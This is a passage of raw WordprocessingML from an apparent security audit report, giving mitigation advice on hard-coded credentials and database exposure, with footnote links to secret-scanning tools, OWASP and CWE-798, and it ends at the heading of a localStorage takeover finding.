        </w:rPr>
        <w:t>ensures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>applications</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>keep using the credentials while not being available to potential adversaries with access to leaked source code, a developer machine, or any other leak. Furthermore, credentials, secrets, and API keys should be randomly generated to mitigate the potential for brute force or password-guessing attacks. For additional mitigation guidance, please see the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>OWASP Cryptographic Storage Cheat Sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>93</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>CWE-798: Use of Hard-coded Credentials </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>94</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="376"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>More broadly, it is important to emphasize the importance of the following related </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487611904">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>143444</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="71" name="Graphic 71"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="71" name="Graphic 71"/>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1.294873pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15704576;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape56" coordorigin="1440,226" coordsize="2880,0" path="m1440,226l4320,226e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="110"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>87</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId150">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://rtyley.github.io/bfg-repo-cleaner/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>88</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId151">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.gitguardian.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>89</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId152">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://github.com/trufflesecurity/trufflehog</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>90</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="22"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId153">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://github.com/awslabs/git-secrets</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>91</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="49"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId154">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://security.stackexchange.com/questions/197784/is-it-unsafe-to-use-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>env…</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>92</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="66"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId155">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://aws.amazon.com/.../aws-secrets-manager-store-distribute-and-rotate-credentials.../</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>93</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId156">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>94</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId157">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://cwe.mitre.org/data/definitions/798.html</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ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Appropriate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>processes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>place</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> to:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2159" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2159" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Regularly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>rotate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2159" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2159" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Revoke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>replace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>compromise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1439" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1439" w:right="0" w:hanging="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MongoDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>exposed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>internet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2160" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="2160" w:right="368" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ought</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>restricted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>so</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>connections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>possible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>from trusted IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2160" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="2160" w:right="366" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In general, exposing admin interfaces and databases to the internet is a bad practice and should be avoided.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250033" w:id="22"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-005</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Possible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>takeover</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Usage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="FF9900"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
